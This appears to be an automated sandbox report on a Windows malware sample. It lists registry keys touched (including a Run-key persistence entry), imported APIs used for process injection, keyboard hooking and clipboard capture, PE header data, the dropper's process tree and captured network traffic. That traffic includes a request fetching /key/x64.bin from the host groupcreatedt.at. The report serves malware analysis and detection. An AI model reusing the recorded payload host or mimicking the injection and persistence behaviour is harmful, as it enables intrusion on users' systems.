HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates\7D7F4414CCEF168ADF6BF40753B5BECD78375931\Blob
HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\ProtectedRoots\Certificates
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\18F7C1FCC3090203FD5BAA2F861A754976C8DD25\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\245C97DF7514E7CF2DF8BE72AE957B9E04741E85\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\7F88CD7223F3C813818C994614A89C99FA3B5247\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\A43489159A520F0D93D032CCAF37E7FE20A8B419\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\BE36A4562FB2EE05DBB3D32323ADF445084ED656\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CDD4EEAE6000AC7F40C3802C171E30148030C072\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EB6D578499B1CCF5F581EAD56BE3D9B6744A5E5\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\742C3192E607E424EB4549542BE1BBC53E6174E2\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\85371CA6E550143DCE2803471BDE3A09E8F8770F\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\97817950D81C9670CC34D809CF794431367EF474\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D23209AD23D314232174E40D7F9D62139786633A\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DE28F4A4FFE5B92FA3C503D1A349A7F9962A8212\Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserenvDebugLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\GpSvcDebugLevel
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\LogLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\LogMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup\LogMaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\79B55E88
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\MachineThrottling
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledSessions\GlobalSession
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\WinHttpSettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\OLE\MaximumAllowedAllocationSize
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\EnableInetUnknownAuth
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Scr
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\{8E20961D-952E-F0AE-8FA2-992433F6DD98}
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Keys
\xe4\xa4\x90\xe2\xbc\x80
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\TorClient
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\InfoTip
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dnshdrt
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E
HKEY_CURRENT_USER\Software\Classes\Local Settings\MuiCache\37\52C64B7E\LanguageList
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Temp
HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\E437B5C6-F3A1-B6FE-9D58-D74A210CFB1E\Client
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableSPDY3_0
kernel32.dll.SortGetHandle
kernel32.dll.SortCloseHandle
kernel32.dll.WriteProcessMemory
kernel32.dll.HeapCreate
kernel32.dll.HeapAlloc
kernel32.dll.HeapFree
kernel32.dll.GetTickCount
ntdll.dll.RtlNtStatusToDosError
ntdll.dll.NtUnmapViewOfSection
ntdll.dll.NtMapViewOfSection
ntdll.dll.memcpy
ntdll.dll.memset
ntdll.dll.ZwClose
ntdll.dll.NtCreateSection
ntdll.dll.mbstowcs
ntdll.dll.ZwOpenProcessToken
ntdll.dll.ZwOpenProcess
ntdll.dll.ZwQueryInformationToken
ntdll.dll.NtQuerySystemInformation
ntdll.dll.RtlFreeUnicodeString
ntdll.dll.ZwQueryInformationProcess
ntdll.dll.RtlUpcaseUnicodeString
ntdll.dll.RtlUnwind
ntdll.dll.NtQueryVirtualMemory
shlwapi.dll.PathFindExtensionW
shlwapi.dll.PathFindFileNameW
shlwapi.dll.PathFindExtensionA
shlwapi.dll.StrRChrA
shlwapi.dll.StrChrA
shlwapi.dll.StrStrIA
shlwapi.dll.StrTrimW
shlwapi.dll.StrChrW
shlwapi.dll.PathFindFileNameA
shlwapi.dll.PathCombineW
setupapi.dll.SetupDiDestroyDeviceInfoList
setupapi.dll.SetupDiEnumDeviceInfo
setupapi.dll.SetupDiGetDeviceRegistryPropertyA
setupapi.dll.SetupDiGetClassDevsA
kernel32.dll.SetEvent
kernel32.dll.Sleep
kernel32.dll.GetExitCodeProcess
kernel32.dll.CreateProcessA
kernel32.dll.lstrlenW
kernel32.dll.GetLastError
kernel32.dll.GetProcAddress
kernel32.dll.ResetEvent
kernel32.dll.LoadLibraryA
kernel32.dll.lstrcmpiW
kernel32.dll.lstrcatW
kernel32.dll.DeleteFileW
kernel32.dll.CreateWaitableTimerA
kernel32.dll.SetFileAttributesW
kernel32.dll.SetWaitableTimer
kernel32.dll.GetModuleHandleA
kernel32.dll.HeapDestroy
kernel32.dll.GetCommandLineW
kernel32.dll.ExitProcess
kernel32.dll.CloseHandle
kernel32.dll.ReadFile
kernel32.dll.WaitForSingleObject
kernel32.dll.CreateFileA
kernel32.dll.CreateEventA
kernel32.dll.GetVersion
kernel32.dll.lstrcmpA
kernel32.dll.GetTempPathA
kernel32.dll.GetTempFileNameA
kernel32.dll.CreateDirectoryA
kernel32.dll.GetFileSize
kernel32.dll.FreeLibrary
kernel32.dll.lstrcpynA
kernel32.dll.GetFileTime
kernel32.dll.FindNextFileA
kernel32.dll.FindClose
kernel32.dll.FindFirstFileA
kernel32.dll.CompareFileTime
kernel32.dll.GetModuleFileNameA
kernel32.dll.lstrcmpiA
kernel32.dll.SetLastError
kernel32.dll.GetModuleHandleW
kernel32.dll.LoadLibraryW
kernel32.dll.TerminateThread
kernel32.dll.GetVersionExW
kernel32.dll.VirtualAlloc
kernel32.dll.IsWow64Process
kernel32.dll.GetCurrentProcessId
kernel32.dll.CreateThread
kernel32.dll.OpenProcess
kernel32.dll.VirtualProtectEx
kernel32.dll.SuspendThread
kernel32.dll.ResumeThread
kernel32.dll.GetLongPathNameW
kernel32.dll.GetModuleFileNameW
kernel32.dll.lstrlenA
kernel32.dll.ExpandEnvironmentStringsA
kernel32.dll.lstrcatA
kernel32.dll.lstrcpyA
kernel32.dll.ExpandEnvironmentStringsW
kernel32.dll.LocalFree
kernel32.dll.SetEndOfFile
kernel32.dll.CreateDirectoryW
kernel32.dll.WriteFile
kernel32.dll.CreateFileW
kernel32.dll.FlushFileBuffers
kernel32.dll.lstrcpyW
kernel32.dll.SetFilePointer
kernel32.dll.VirtualFree
user32.dll.DefWindowProcW
user32.dll.SendMessageW
user32.dll.GetSystemMetrics
user32.dll.CreateWindowExW
user32.dll.SetWindowLongW
user32.dll.SetClassLongW
user32.dll.SystemParametersInfoW
user32.dll.GetAncestor
user32.dll.GetWindowLongW
user32.dll.RegisterClassExW
user32.dll.GetForegroundWindow
user32.dll.TranslateMessage
user32.dll.GetMessageW
user32.dll.keybd_event
user32.dll.DestroyWindow
user32.dll.wsprintfW
user32.dll.wsprintfA
user32.dll.DispatchMessageW
user32.dll.GetCursorInfo
advapi32.dll.OpenProcessToken
advapi32.dll.RegDeleteValueW
advapi32.dll.RegEnumKeyExA
advapi32.dll.RegOpenKeyW
advapi32.dll.GetTokenInformation
advapi32.dll.GetSidSubAuthorityCount
advapi32.dll.GetSidSubAuthority
advapi32.dll.RegSetValueExW
advapi32.dll.RegOpenKeyA
advapi32.dll.RegCreateKeyA
advapi32.dll.ConvertStringSecurityDescriptorToSecurityDescriptorA
advapi32.dll.RegCloseKey
advapi32.dll.RegOpenKeyExA
advapi32.dll.RegQueryValueExW
advapi32.dll.RegSetValueExA
advapi32.dll.RegQueryValueExA
shell32.dll.#92
shell32.dll.ShellExecuteW
shell32.dll.ShellExecuteExW
ole32.dll.CoUninitialize
ole32.dll.CoInitializeEx
wintrust.dll.WinVerifyTrust
user32.dll.FindWindowA
user32.dll.GetWindowThreadProcessId
kernel32.dll.Wow64EnableWow64FsRedirection
setupapi.dll.CM_Get_Device_Interface_List_Size_ExW
setupapi.dll.CM_Get_Device_Interface_List_ExW
comctl32.dll.#386
advapi32.dll.UnregisterTraceGuids
comctl32.dll.#321
oleaut32.dll.#9
kernel32.dll.SetThreadUILanguage
kernel32.dll.CopyFileExW
kernel32.dll.IsDebuggerPresent
kernel32.dll.SetConsoleInputExeNameW
advapi32.dll.SaferIdentifyLevel
advapi32.dll.SaferComputeTokenFromLevel
advapi32.dll.SaferCloseLevel
ntdll.dll.ZwWow64QueryInformationProcess64
ntdll.dll.ZwWow64ReadVirtualMemory64
ntdll.dll.strcpy
ntdll.dll.NtResumeProcess
ntdll.dll.NtSuspendProcess
ntdll.dll._snprintf
ntdll.dll._wcsupr
ntdll.dll._strupr
ntdll.dll.memmove
ntdll.dll.wcscpy
ntdll.dll.ZwQueryKey
ntdll.dll.wcstombs
ntdll.dll.RtlImageNtHeader
ntdll.dll.RtlAdjustPrivilege
ntdll.dll.sprintf
ntdll.dll.wcscat
ntdll.dll.__C_specific_handler
ntdll.dll.__chkstk
kernel32.dll.GetComputerNameW
kernel32.dll.FileTimeToLocalFileTime
kernel32.dll.QueueUserWorkItem
kernel32.dll.SystemTimeToFileTime
kernel32.dll.GetLocalTime
kernel32.dll.RemoveDirectoryA
kernel32.dll.DeleteFileA
kernel32.dll.HeapReAlloc
kernel32.dll.GetCurrentThread
kernel32.dll.GetSystemTimeAsFileTime
kernel32.dll.GetWindowsDirectoryA
kernel32.dll.CopyFileW
kernel32.dll.GetCurrentThreadId
kernel32.dll.DuplicateHandle
kernel32.dll.SwitchToThread
kernel32.dll.MapViewOfFile
kernel32.dll.UnmapViewOfFile
kernel32.dll.LeaveCriticalSection
kernel32.dll.EnterCriticalSection
kernel32.dll.OpenWaitableTimerA
kernel32.dll.OpenMutexA
kernel32.dll.WaitForMultipleObjects
kernel32.dll.CreateMutexA
kernel32.dll.ReleaseMutex
kernel32.dll.GetVersionExA
kernel32.dll.InitializeCriticalSection
kernel32.dll.UnregisterWait
kernel32.dll.TlsGetValue
kernel32.dll.LoadLibraryExW
kernel32.dll.TlsSetValue
kernel32.dll.RegisterWaitForSingleObject
kernel32.dll.VirtualProtect
kernel32.dll.TlsAlloc
kernel32.dll.GetDriveTypeW
kernel32.dll.GetLogicalDriveStringsW
kernel32.dll.WideCharToMultiByte
kernel32.dll.CreateFileMappingA
kernel32.dll.OpenFileMappingA
kernel32.dll.GlobalLock
kernel32.dll.GlobalUnlock
kernel32.dll.Thread32First
kernel32.dll.Thread32Next
kernel32.dll.QueueUserAPC
kernel32.dll.OpenThread
kernel32.dll.CreateToolhelp32Snapshot
kernel32.dll.CallNamedPipeA
kernel32.dll.WaitNamedPipeA
kernel32.dll.ConnectNamedPipe
kernel32.dll.GetOverlappedResult
kernel32.dll.DisconnectNamedPipe
kernel32.dll.CreateNamedPipeA
kernel32.dll.CancelIo
kernel32.dll.GetSystemTime
kernel32.dll.RemoveVectoredExceptionHandler
kernel32.dll.SleepEx
kernel32.dll.AddVectoredExceptionHandler
kernel32.dll.OpenEventA
kernel32.dll.LocalAlloc
kernel32.dll.RaiseException
kernel32.dll.FileTimeToSystemTime
kernel32.dll.DeleteCriticalSection
kernel32.dll.RemoveDirectoryW
kernel32.dll.FindNextFileW
kernel32.dll.FindFirstFileW
kernel32.dll.SetFilePointerEx
kernel32.dll.GetFileAttributesW
oleaut32.dll.#8
oleaut32.dll.#2
oleaut32.dll.#6
advapi32.dll.GetUserNameA
psapi.dll.EnumProcessModules
shlwapi.dll.StrToIntExA
shlwapi.dll.StrTrimA
winhttp.dll.WinHttpOpen
winhttp.dll.WinHttpConnect
winhttp.dll.WinHttpOpenRequest
winhttp.dll.WinHttpQueryOption
winhttp.dll.WinHttpSetOption
winhttp.dll.WinHttpSendRequest
ws2_32.dll.GetAddrInfoW
ws2_32.dll.WSASocketW
ws2_32.dll.#2
ws2_32.dll.#21
ws2_32.dll.#9
ws2_32.dll.WSAIoctl
ws2_32.dll.FreeAddrInfoW
ws2_32.dll.#6
ws2_32.dll.#5
ws2_32.dll.WSARecv
ws2_32.dll.WSASend
winhttp.dll.WinHttpReceiveResponse
schannel.dll.SpUserModeInitialize
advapi32.dll.RegCreateKeyExW
secur32.dll.FreeContextBuffer
ncrypt.dll.SslOpenProvider
ncrypt.dll.GetSChannelInterface
bcryptprimitives.dll.GetHashInterface
ncrypt.dll.SslIncrementProviderReferenceCount
ncrypt.dll.SslImportKey
bcryptprimitives.dll.GetCipherInterface
ncrypt.dll.SslLookupCipherSuiteInfo
user32.dll.LoadStringW
ncrypt.dll.BCryptOpenAlgorithmProvider
ncrypt.dll.BCryptGetProperty
ncrypt.dll.BCryptCreateHash
ncrypt.dll.BCryptHashData
ncrypt.dll.BCryptFinishHash
ncrypt.dll.BCryptDestroyHash
crypt32.dll.CertGetCertificateChain
userenv.dll.GetUserProfileDirectoryW
sechost.dll.ConvertSidToStringSidW
sechost.dll.ConvertStringSidToSidW
userenv.dll.RegisterGPNotification
gpapi.dll.RegisterGPNotificationInternal
sechost.dll.OpenSCManagerW
sechost.dll.OpenServiceW
sechost.dll.CloseServiceHandle
sechost.dll.QueryServiceConfigW
cryptnet.dll.CryptGetObjectUrl
cryptnet.dll.I_CryptNetGetConnectivity
sensapi.dll.IsNetworkAlive
rpcrt4.dll.RpcBindingFromStringBindingW
rpcrt4.dll.RpcBindingSetAuthInfoExW
rpcrt4.dll.NdrClientCall3
cryptnet.dll.CryptRetrieveObjectByUrlW
setupapi.dll.SetupIterateCabinetW
cabinet.dll.#20
cabinet.dll.#22
devrtl.dll.DevRtlGetThreadLogToken
kernel32.dll.RegOpenKeyExW
kernel32.dll.RegCloseKey
cabinet.dll.#23
cryptsp.dll.CryptAcquireContextA
cryptsp.dll.CryptCreateHash
cryptsp.dll.CryptSetHashParam
cryptsp.dll.CryptImportKey
cryptsp.dll.CryptVerifySignatureA
cryptsp.dll.CryptDestroyKey
cryptsp.dll.CryptDestroyHash
cryptsp.dll.CryptHashData
sechost.dll.QueryServiceConfigA
sechost.dll.QueryServiceStatus
rpcrt4.dll.RpcStringBindingComposeA
rpcrt4.dll.RpcBindingFromStringBindingA
rpcrt4.dll.RpcEpResolveBinding
sechost.dll.LookupAccountSidLocalW
sechost.dll.LookupAccountNameLocalW
rpcrt4.dll.RpcStringFreeA
rpcrt4.dll.RpcBindingFree
winhttp.dll.WinHttpSetTimeouts
winhttp.dll.WinHttpCrackUrl
winhttp.dll.WinHttpGetDefaultProxyConfiguration
winhttp.dll.WinHttpGetIEProxyConfigForCurrentUser
cryptbase.dll.SystemFunction036
advapi32.dll.RegDeleteTreeA
advapi32.dll.RegDeleteTreeW
ole32.dll.CoTaskMemAlloc
ole32.dll.StringFromIID
nsi.dll.NsiAllocateAndGetTable
cfgmgr32.dll.CM_Open_Class_Key_ExW
iphlpapi.dll.ConvertInterfaceGuidToLuid
iphlpapi.dll.GetIfEntry2
iphlpapi.dll.GetIpForwardTable2
iphlpapi.dll.GetIpNetEntry2
iphlpapi.dll.FreeMibTable
ole32.dll.CoTaskMemFree
nsi.dll.NsiFreeTable
oleaut32.dll.#500
winhttp.dll.WinHttpGetProxyForUrl
winhttp.dll.WinHttpTimeFromSystemTime
winhttp.dll.WinHttpQueryHeaders
shlwapi.dll.StrStrIW
winhttp.dll.WinHttpQueryDataAvailable
winhttp.dll.WinHttpReadData
winhttp.dll.WinHttpCloseHandle
cryptnet.dll.I_CryptNetSetUrlCacheFlushInfo
bcryptprimitives.dll.GetAsymmetricEncryptionInterface
ncrypt.dll.BCryptImportKeyPair
ncrypt.dll.BCryptVerifySignature
ncrypt.dll.BCryptDestroyKey
winhttp.dll.WinHttpSetStatusCallback
crypt32.dll.CertVerifyCertificateChainPolicy
crypt32.dll.CertFreeCertificateChain
crypt32.dll.CertDuplicateCertificateContext
ncrypt.dll.SslEncryptPacket
ncrypt.dll.SslDecryptPacket
ole32.dll.CreateStreamOnHGlobal
crypt32.dll.CertFreeCertificateContext
user32.dll.GetShellWindow
ntdll.dll.RtlExitUserThread
kernel32.dll.CreateRemoteThread
advapi32.dll.GetUserNameW
ncrypt.dll.SslFreeObject
ws2_32.dll.#22
ws2_32.dll.#3
user32.dll.SetWindowsHookExA
user32.dll.RegisterClassA
user32.dll.CreateWindowExA
user32.dll.GetWindowLongPtrA
user32.dll.DefWindowProcA
user32.dll.SetWindowLongPtrA
user32.dll.SetClipboardViewer
user32.dll.IsClipboardFormatAvailable
user32.dll.GetClipboardOwner
user32.dll.RegisterDeviceNotificationA
user32.dll.GetMessageA
"C:\Users\user\AppData\Local\Temp\DA24\BF2.bat" "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\ERFKBW~1.EXE"
cmd /c ""C:\Users\user\AppData\Local\Temp\DA24\BF2.bat" "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\ERFKBW~1.EXE""
C:\Users\user\AppData\Local\Temp\DA24\BF2.bat "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\ERFKBW~1.EXE"
cmd /C ""C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\ERFKBW~1.EXE""
"C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\ERFKBW~1.EXE"
C:\Windows\system32\svchost.exe
sneddddga
{202A4396-FFD6-5278-8954-A3A6CDC8873A}
Local\{C08C1C5D-1F99-F213-A9F4-C346ED68A7DA}
{C4CA9F68-5357-9674-FD38-372A81EC5BFE}

PE Information

Image Base 0x00400000
Entry Point 0x00405493
Reported Checksum 0x000578ee
Actual Checksum 0x000578ee
Minimum OS Version 5.1
Compile Time 2016-05-10 03:04:39
Import Hash cc79e5d1893e37143e121d47aeb51eb4

Sections

Name Virtual Address Virtual Size Size of Raw Data Characteristics Entropy
.text 0x00001000 0x00008212 0x00008400 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 5.36
.data 0x0000a000 0x000006ca 0x00000800 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 0.64
.rsrc 0x0000b000 0x00045910 0x00045a00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 8.00

Imports

Library advapi32.dll:
0x402000 CryptSignHashA
0x402004 InitializeAcl
0x402008 RegReplaceKeyW
0x40200c RegSaveKeyA
0x402010 IsTextUnicode
0x402014 RegCreateKeyExA
0x402018 RegLoadKeyA
0x40201c LogonUserA
0x402020 RegEnumKeyA
0x402024 OpenEventLogW
0x402028 ReadEventLogA
0x40202c RegRestoreKeyA
0x402030 RegUnLoadKeyW
Library kernel32.dll:
0x402038 GetProcAddress
0x40203c OpenWaitableTimerW
0x402040 GetTempPathA
0x402044 CreateFileW
0x402048 GetCurrencyFormatA
0x40204c FindResourceExW
0x402050 IsBadWritePtr
0x402054 InterlockedExchange
0x402058 FindFirstFileW
0x40205c GetFullPathNameW
0x402060 GetProfileStringA
0x402064 GlobalAddAtomW
0x402068 LoadLibraryExA
0x40206c SetEvent
0x402070 GetModuleHandleA
0x402074 CreateMutexA
0x402078 GetPriorityClass
0x40207c ReadFile
0x402080 lstrcmp
0x402084 GetConsoleTitleA
0x402088 CreateFileMappingW
0x40208c ResumeThread
0x402090 OpenMutexA
0x402094 FormatMessageW
0x402098 CreateSemaphoreW
0x4020a8 GetConsoleAliasA
0x4020ac GetStartupInfoA
0x4020b0 ReadConsoleW
0x4020b8 FindNextFileA
Library mprapi.dll:
0x4020c0 MprInfoBlockAdd
0x4020c4 MprAdminDeviceEnum
0x4020c8 MprInfoBlockFind
Library crypt32.dll:
0x4020d0 CryptMemFree
0x4020d8 CertFindExtension
0x4020e0 CertCloseStore
0x4020e4 CryptFindOIDInfo
0x4020e8 CertControlStore
0x4020ec CertDuplicateStore
0x4020f0 CryptDecodeMessage
0x4020f8 CertGetNameStringA
0x402104 CertAlgIdToOID
0x402108 CryptMemAlloc
Library certcli.dll:
0x402110 CACloseCA
0x402114 CAEnumFirstCA

.text
`.data
.rsrc
!"#$%&'
)*+,-./
1234567
9:;<=>?
OpenEventLogW
RegUnLoadKeyW
CryptSignHashA
ReadEventLogA
IsTextUnicode
RegRestoreKeyA
RegLoadKeyA
RegCreateKeyExA
LogonUserA
RegEnumKeyA
RegReplaceKeyW
InitializeAcl
RegSaveKeyA
advapi32.dll
FindFirstFileW
CreateSemaphoreW
LoadLibraryExA
lstrcmp
ReadFile
CreateFileMappingW
GetFullPathNameW
InterlockedExchange
ResumeThread
GetPriorityClass
GetStartupInfoA
CreateFileW
GetPrivateProfileIntA
FormatMessageW
GetConsoleAliasA
GlobalAddAtomW
GetCurrencyFormatA
InterlockedIncrement
GetProfileStringA
SetEvent
ReadConsoleW
GetConsoleTitleA
GetModuleHandleA
FindNextFileA
GetProcAddress
WaitForSingleObjectEx
GetLogicalDriveStringsW
CreateMutexA
FindResourceExW
OpenWaitableTimerW
IsBadWritePtr
GetTempPathA
OpenMutexA
kernel32.dll
MprInfoBlockAdd
MprAdminDeviceEnum
MprInfoBlockFind
mprapi.dll
CryptMemFree
CertDuplicateStore
CryptMemAlloc
CertAlgIdToOID
CertFindExtension
CryptDecodeMessage
CertDuplicateCRLContext
CertGetNameStringA
CryptBinaryToStringA
CertCompareCertificate
CryptFindOIDInfo
CertControlStore
CertDeleteCRLFromStore
CertCloseStore
CertCreateCRLContext
crypt32.dll
CAEnumFirstCA
CACloseCA
certcli.dll
gbycfilt.dll
egggeProcessMemory
ggrnel32.dll
ggapCreate
oruqvrjjmiprs
ernibkis
sneddddga
hokoa.pdb
!"#$%&'
)*+,-./
1234567
9:;<=>?
3QE*8
)cP=u
ZZ#bW
!-"*yv
X2;Hw
MqQ@\
[RK!kU
ljm,8
This file is not on VirusTotal.

Process Tree

  • ErfkBwzLz2p.exe 920
    • cmd.exe 332 cmd /c ""C:\Users\user\AppData\Local\Temp\DA24\BF2.bat" "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\ERFKBW~1.EXE""
      • cmd.exe 2576 cmd /C ""C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\ERFKBW~1.EXE""
        • corrawex.exe 948 "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\ERFKBW~1.EXE"
  • explorer.exe 1632

ErfkBwzLz2p.exe, PID: 920, Parent PID: 2480
Full Path: C:\Users\user\AppData\Local\Temp\ErfkBwzLz2p.exe
Command Line: "C:\Users\user\AppData\Local\Temp\ErfkBwzLz2p.exe"
cmd.exe, PID: 332, Parent PID: 920
Full Path: C:\Windows\SysWOW64\cmd.exe
Command Line: cmd /c ""C:\Users\user\AppData\Local\Temp\DA24\BF2.bat" "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\ERFKBW~1.EXE""
cmd.exe, PID: 2576, Parent PID: 332
Full Path: C:\Windows\SysWOW64\cmd.exe
Command Line: cmd /C ""C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\ERFKBW~1.EXE""
corrawex.exe, PID: 948, Parent PID: 2576
Full Path: C:\Users\user\AppData\Roaming\Microsoft\Bdeudlgs\corrawex.exe
Command Line: "C:\Users\user\AppData\Roaming\MICROS~1\Bdeudlgs\corrawex.exe" "C:\Users\user\AppData\Local\Temp\ERFKBW~1.EXE"
svchost.exe, PID: 2092, Parent PID: 948
Full Path: C:\Windows\sysnative\svchost.exe
Command Line: C:\Windows\system32\svchost.exe
explorer.exe, PID: 1632, Parent PID: 1496
Full Path: C:\Windows\explorer.exe
Command Line: C:\Windows\Explorer.EXE

Hosts

Direct IP Country Name
Y 8.8.8.8 United States
N 23.202.161.73 United States
N 192.42.116.41 Netherlands
N 192.229.232.240 United States
N 185.85.0.29 Germany

TCP

Source Source Port Destination Destination Port
192.168.35.21 49176 185.85.0.29 www.php.net 80
192.168.35.21 49177 185.85.0.29 www.php.net 443
192.168.35.21 49199 185.85.0.29 www.php.net 80
192.168.35.21 49201 185.85.0.29 www.php.net 443
192.168.35.21 49182 192.229.232.240 www.download.windowsupdate.com 80
192.168.35.21 49204 192.229.232.240 www.download.windowsupdate.com 80
192.168.35.21 49200 192.42.116.41 groupcreatedt.at 80
192.168.35.21 49188 23.202.161.73 www.microsoft.com 80
192.168.35.21 49189 23.202.161.73 www.microsoft.com 80

UDP

Source Source Port Destination Destination Port
192.168.35.21 53447 8.8.8.8 53
192.168.35.21 57255 8.8.8.8 53
192.168.35.21 58094 8.8.8.8 53
192.168.35.21 65365 8.8.8.8 53

DNS

Name Response Post-Analysis Lookup
www.php.net A 185.85.0.29
CNAME www-php-net.ax4z.com
www.download.windowsupdate.com CNAME cs12.wpc.v0cdn.net
A 192.229.232.240
CNAME 2-01-3cf7-0009.cdx.cedexis.net
CNAME wu.ec.azureedge.net
CNAME wu.wpc.apr-52dd2.edgecastdns.net
CNAME wu.azureedge.net
www.microsoft.com CNAME www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
CNAME e13678.dspb.akamaiedge.net
CNAME www.microsoft.com-c-3.edgekey.net
A 23.202.161.73
groupcreatedt.at A 192.42.116.41

HTTP Requests

URI Data
http://www.php.net/license/3_0.txt
GET /license/3_0.txt HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: www.php.net

http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
Cache-Control: max-age = 86403
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Wed, 19 Apr 2017 22:43:31 GMT
If-None-Match: "80ab755e5eb9d21:0"
User-Agent: Microsoft-CryptoAPI/6.1
Host: www.download.windowsupdate.com

http://www.microsoft.com/pki/certs/MicRooCerAut_2010-06-23.crt
GET /pki/certs/MicRooCerAut_2010-06-23.crt HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/6.1
Host: www.microsoft.com

http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1
Cache-Control: max-age = 3600
Connection: Keep-Alive
Accept: */*
If-Modified-Since: Wed, 26 Feb 2020 21:39:14 GMT
If-None-Match: "06d5b30edecd51:0"
User-Agent: Microsoft-CryptoAPI/6.1
Host: www.download.windowsupdate.com

http://groupcreatedt.at/key/x64.bin
GET /key/x64.bin HTTP/1.1
Cache-Control: no-cache
